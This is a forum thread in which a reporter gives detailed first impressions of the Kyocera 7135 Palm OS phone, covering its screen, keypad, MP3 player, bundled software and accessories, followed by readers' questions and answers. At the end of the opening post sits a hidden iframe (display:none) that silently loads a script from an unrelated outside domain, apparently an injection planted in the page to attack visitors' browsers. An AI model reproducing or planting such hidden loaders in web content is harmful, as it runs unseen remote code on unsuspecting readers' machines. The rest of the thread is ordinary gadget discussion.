+ Reply to Thread
Page 1 of 5 1 2 3 4 5 LastLast

First impressions of Kyocera 7135 (long post)

I sent this to Palm Infocenter 6 hours ago, but it hasn't been posted yet, so I copy it here:

I spent about an hour with a Kyocera 7135 this morning at TechX NY. I found a lot to like and very little not to like. If it holds up to real-world testing, this is easily going to be the strongest offering, for my money, to hit the market this year. I won't repeat the published specs. Here's what I learned that was new, along with my subjective impressions.

To fill the biggest gap in the official marketing pitch, which speaks only of a "high resolution" screen: it is a standard 160 x 160 color screen -- identical in size, 2.5 in. on the diagonal -- to the Kyocera 6035. That said, it is a very bright, well-saturated color transreflective screen. 16 bit, 65,000 colors. Without doing precise measurement, I'd say it is indistinguishable from the Palm M130 screen in brightness, sharpness and size. In indoor lighting, it is terrific. I took it to the great glass atrium of the Javits Center, which gets a lot of filtered sun, and it was also quite readable. Outside in direct 11 am sunlight, it washed out pretty badly. There, and only there, my Kyocera 6035 had a strong edge.

Another gap: the processor is a Dragonball VZ running 33 Mhz.

The hardware has a solid, precision feel, very comfortable in the hand. It's injection-molded plastic with a brushed aluminum swoosh on the front with the Kyocera logo. The hinges, the PR guy said, feel like a Mercedes car door. I don't know about that, but it is a very well made piece of iron. The flip has a lock-open position but holds stably at any angle you choose.

The OS as published is Kyocera's heavily tweaked 4.1. It will never run OS 5, nor does it need to as it does not run on an ARM.

Kyocera is not in a position to announce carriers, but sources tell me Sprint and Verizon, among other smaller vendors, will sell it. Likely retail: $499.

Because it is GPS ready, it will take immediate advantage of Enhanced 911 services when they roll out. Commercial location-based services will also be supported, but no carrier appears to be close to announcing one.

Kyocera considers the phone to meet 3G standards, with immediate support for Verizon Express at up to 153 kbp/s. It will support Sprint's forthcoming high speed data.

The LCD at the top is indeed for Caller ID. It will display the name of the caller, as the main screen does, if the caller is in your Address book. When no call comes in, the LCD is always on, showing battery and signal strength and the time.

The battery is user-replaceable on the road, which Kyocera holds out as a major advantage over the competition. The battery life of 3.5 hours talk and 150 hours standby, loses something to the world champion Kyocera 6035's respective ratings of 5 hours and 180 hours.

The phone will come with an earbud/mike. The optional stereo earbuds also have a mike -- they're used for MP3 music and phone talk as well.

I tried the MP3 player with the optional stereo earbuds. It sounded good but not as good as my Nomad II. Even in a noisy conference hall, it was capable of painful loudness at top volume. The Kyocera booth had external speakers plugged into a demo unit, with a polished multimedia presentation running on the 7135, and the sound was remarkable. Rick Goetter, marketing director for the 7135, said he has used the MP3 for 4.5 hours, with telephone off, and still had half his battery left. I find that remarkable if it holds up.

The jog dial of the 6035 is gone. In its place are up and down buttons that control only phone volume. There will be an SDK released with the phone, without delay, but it's not clear whether it is capable of addressing these buttons for Palm OS functions.

What replaces the jog dial is an OK button in the center of the Palm OS up/down rocker (at center between the four standard hardware buttons). So you can scroll down through the address book, for example, then push the OK button for choice of numbers to dial. I liked it.

Kyocera has taken advantage of a design that makes the 7135's phone keypad available during Palm OS operations (with flip open) -- as the 6035's was not.

So: the phone's hardware keypad can be used for text search and text entry. With the Address Book open, pressing phone keys runs "predictive search" algorithms similar to those used in the terrific TakePhone software product. Pressing 4355, for instance, will bring up people named Gellman in my Address Book. The phone keys can also be employed, perhaps less usefully in my view, for text entry in standard Palm apps such as the Memo Pad. In this case, though, the text is not predictive -- you press 2 for A, 22 for B, 222 for C; then 3 for D, 33 for E and so on. There is a SPACE key, and CLEAR works as backspace. Oddly it is quite difficult to use the phone keys to enter numbers in the Memo Pad. The # button will put the keypad into numeric mode, so that pressing 2 gives you a 2 instead of an A, but it drops out after a pause of well under a second. I found it impossible to enter a whole phone number that way, which was a pity.

Goetter said they considered a Blackberry style keyboard, and he couldn't comment on whether it might come later. He did not that Kyocera is a phone-centric company.

Speakerphone, voice activated dialing work like the 6035's. The voice memo may -- this was a point of uncertainty in the booth -- be able to write to the SD card. If so it would allow much longer voice memos.

It ships with Eudora 2.1.1, the current version on the 6035. Each carrier will decide on and HTML browser. It also ships standard with Open Wave's WAP browser. It appears that it will ship with Workstyle's Palm client for MS Exchange or Lotus Notes email. This, the Workstyle folks told me, will cost $70/year for an individual license. It will also ship with no-extra-charge support for Palm web clipping apps, as did the 6035.

The prerelease software supports two-way SMS, which didn't come until later versions in the 6035. Beta units were running on Verizon networks at the show.

The phone will be available in Q4. Goetter said "November, maybe earlier." For Q4, it doesn't get earlier than October.

Kyocera is offering direct sales to retail and corporate clients, bundled with carrier service. No announcement of which carrier.

The phone software includes several new apps.

One is File Manager, which gives hierarchical folder/file access to the SD card and the 16MB of native memory. I own a 128MB SD card, and Goetter said the 7135 will have no trouble addressing that. The File Manager supports copy, move, delete. I can't recall whether it supports rename or beam.

Another bundled app is PhotoSuite, which has native support for JPG and TIFF, possibly others. Also plays AVI video, but I did not get to preview that. The photos looked good enough to bother carrying, which they didn't on the 6035, but certainly no match for Sony's hi-res screens.

For MP3 there is a proprietary Jukebox app, which toggles instantly with a Playlist app. There's a separate Downloader used in the cradle for transferring MP3s from your Desktop. This is controlled from the Palm, not through HotSync.

A new feature: you can optionally set the flip to answer and hang up the phone.

The sync cradle improves on the 6035's excellent design. It allows the AC charger to be detached for travel. The improvement: the cable terminates in a serial AND a USB connector.

The Stowaway keyboard will be available immediately on release. For those who bought the 6035 version -- good news. You'll need only a new cable. There will be no cradle required for the keyboard with the 7135, so there's less to carry. The compromise this time is that the phone is simply laid on the table, and you adjust the screen angle to suit you. I did not get to try it but it seemed likely to work pretty well. The disadvantage will be in really confined spaces, like an Amtrak tray table.

I asked Goetter for his points of comparison with the competition. He named: tri-mode phone (for more coverage), expansion slot, user-replaceable battery, MP3, and 65k color screen. He acknowledged his phone is an ounce heavier and a bit thicker than the Treo.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Thanks for all the info - just the kind of stuff I would've been looking for. It sounds like a great phone, I'm sure it's missing some of the bells and whistles of the 6035 (built in fax modem, speakerphone, voice recorder) but it more than makes up for it with other innovations.

Can you comment on it's size? Are you familiar with the startac?

Did you notice a startac-like clip/holster for it?

What did they say about the stowaway? Targus hasn't been very generous about providing connector cables in the past (Handspring Visor to Edge PDA's, and they don't provide a cable to connect to the 6035 from any other version of the stowaway). Did he give you the impression that stowaway would make a cable available for purchase, or just that it was possible to do so?

Anyways, thanks again for all the enlightening info.

One last - can you confirm a Nov 2002 product launch date?

JRADI:

No offense at all intended, but you must not have read the prior post very carefully as he mentions virtually every question you raised:

Speakerphone: Yes
    Voice Memo: Yes
    Fax (From the website info): Yes
    November 2002 release: Yes

Thanks [b:808a3aad15]gellmanb [/b:808a3aad15] for the info....very informative. Funny thing is that I stopped by one of the four local Verzion stores this afternoon on my way home and this was all news to them, I ended up leaving all the source material that I had printed off these past two days with them and the store manager promised to run down any additional information for me that he could find. As usual, we the end user know more about the product than ther persons whom are supposed to...

Cheers,

--terry

*.*
    Thank's for that great report, gellmanb!! It sounds like a phone that rocks (literally).

While I'm a bit disappointed that it won't have an ARM processor or OS5, I'm glad to hear that I won't have to replace my keyboard. It seems that Kyocera has learned much from the 6035 (and hopefully, all of us). Also the news of a simultaneously released SDK is good to hear.

The predictave search of TakePhone is one of my must-haves now. And in spite of the new phones use of it, I'm sure I'll be porting TakePhone to the 7135, assuming I get one.

No doubt, Verizon will find out they carry it after they've sold a few

Ringer

GELLMANB - Great Information, I would have never remembered all that.

Any feedback on the Ringer! Loudness specifically, it's a problems that still haunts me with the 6035 being able to heard that thing in anything other than the library.

On my 12th PDA phone!
    [b:0b321948d2]I CAN'T WAIT!!![/b:0b321948d2]
    Convirged since 1999 with a Qualcomm pdQ-800!

Re: Ringer

[quote:ae2538d643="Kevinw"]GELLMANB - Great Information, I would have never remembered all that.

Any feedback on the Ringer! Loudness specifically, it's a problems that still haunts me with the 6035 being able to heard that thing in anything other than the library.[/quote:ae2538d643]

I have had almost every line of QUALCOMM/Kyocera handset, and the 6035 ringer is fine....

We must remeber it is a speaker that does the ringing as opposed to ringers in regular hadnsets.

Maybe they will have a seperate ringer int his one ?

Everything sounds just PERFECT to me. But I am curious if the "Stowaway" keyboard will work during data calls on the 7135. Past keyboards didn't. I hope so. I am a Yahoo IM addict!
    ~Markito

[quote:4f8585a23d="Markito Burrito"]Everythinmg sounds just PERFECT to me. But I am curious if the "Stowaway" keyboard will work during data calls on the 7135. Past keyboards didn't. I hope so. I am a Yahoo IM addict!
    ~Markito[/quote:4f8585a23d]

I had heard from a Kyocera guy that they were looking to over come that same issue on the next smartphone. THis was months ago...I hope it's true.

There are a bunch of questions in this thread that I answered in the first post. A couple that I didn't:

* Will data transmission work during keyboard use? Yes. Rick Goetter said you can read and reply to email while connected, and the keyboard works during web browsing as well.

* Ringer loudness? I didn't think to test it. I don't know.

* Clip/holster? I didn't see it, but Kyocera offers one. The caller ID display assumes you'll wear the phone on your belt.

* Built in fax/modem for use with PC? Yes, same as 6035. I asked and learned of nothing the 6035 had that the 7135 doesn't, save only the jog dial.

* How I remembered everything? I didn't. I'm a reporter. I took notes.

With regard to the phone keypad-- what most phones do (my wife's Nokia, f'rinstance) is employ a predictive search algorithm called "T9" from Tegic. It does what TAKEphONE does for the address book, but does it with a small English dictionary instead of the address book list. In other words, to type "in other words" you type 46068437096737 and it looks up each word as you type it.

Why do I mention this? Because there's a Palm version of T9 that works via a soft phone keypad on the screen! It probably wouldn't be too hard to update the app for the 7135-- and probably not much harder to hammer out a licensing agreement with Kyocera and get it burned into the ROM.

That would make using the numeric pad for letters a snap and would *really* round out the functionality of the product.

--not that I'm complaining, mind you.

This will be my first palm computer since my DOS based HP100LX, if CellularOne Western Wireless permits it on their network. They run the 3035 and will special order the 6035. I always have a cell phone on my belt, and the idea of adding a second device like a PalmOS or PocketPC was hard. However, stepping up from a 3 oz phone to a 7 oz Palm-phone will be okay.

How about charging an extra battery? How about extended-extra larger battery? How about a separate battery charger?

How much of a problem is it making a phone call outside? I would spring for a 6035, but not with only 8 mb of ram and no expansion slot.

Bluetooth built in would be nice. This would be a perfect use for Bluetooth to allow synching, beaming, etc.

Barry in Sheridan, Wyoming

One question that I haven't seen answered anywhere else: Does it have an equivalent of the 6035 flip-closed mode?

- Eric S.

[quote:5aefc8e50e]How about charging an extra battery? How about extended-extra larger battery? How about a separate battery charger? [/quote:5aefc8e50e]

Included cradle, like 6035's, charges a second battery along with phone. No extended larger battery. No separate battery charger.

[quote:5aefc8e50e]Does it have an equivalent of the 6035 flip-closed mode? [/quote:5aefc8e50e]

Nope. With flip closed, it's solid casing on all sides. Good for protecting screen, though.

Re: Ringer

Well all that's true but I still can't hear it as well as I hear my Nokia. I still hope I get a way (anyway) to hear it in a crowded room or in a car with the window open.

[quote:cf25ffb5db="HoTSynC"]
    I have had almost every line of QUALCOMM/Kyocera handset, and the 6035 ringer is fine....

We must remeber it is a speaker that does the ringing as opposed to ringers in regular hadnsets.

Maybe they will have a seperate ringer int his one ?[/quote:cf25ffb5db]

ep

Lighted Grafitti area?

Thanks for the awesome review! I am amazed that this phone really fixes 95% of my complaints about the 6035. I've worked the the 6035 for about 15 months now and love it dearly!

One thing I didn't see in your review, is the Grafitti area lighted in any way? One of my annoyances is trying to graffitti in the dark, I really cannot see the silkscreen and I get lots of errors.

Thanks!

ep

*.*
    [quote:50d3dd4a94="barrywohl"]...Bluetooth built in would be nice. This would be a perfect use for Bluetooth to allow synching, beaming, etc.

Barry in Sheridan, Wyoming[/quote:50d3dd4a94]

True, but there are Bluetooth cards available. The drawback is having extended memory unavailable during use.

[img:50d3dd4a94]http://www.infosync.no/news/2002/06/19/gfx/toshiba_bluetooth_01.jpg[/img:50d3dd4a94]

http://www.infosync.no/news/2002/n/1962.html

[quote:4ce2a1a2af]is the Grafitti area lighted in any way?[/quote:4ce2a1a2af]

Yes, I forgot to mention that. Graffiti area and phone keys light in the dark.

gellmanb, great post.

Some ergonomic questions:
    Any comments on using the separate Grafitti area not attached to the main screen?

Does the OK button work in apps other than the addressbook?

Also could you expand on the lock open flip... How do you lock it? Will it flip to a full 180°? Any idea what might happen if (when) you drop it while locked open?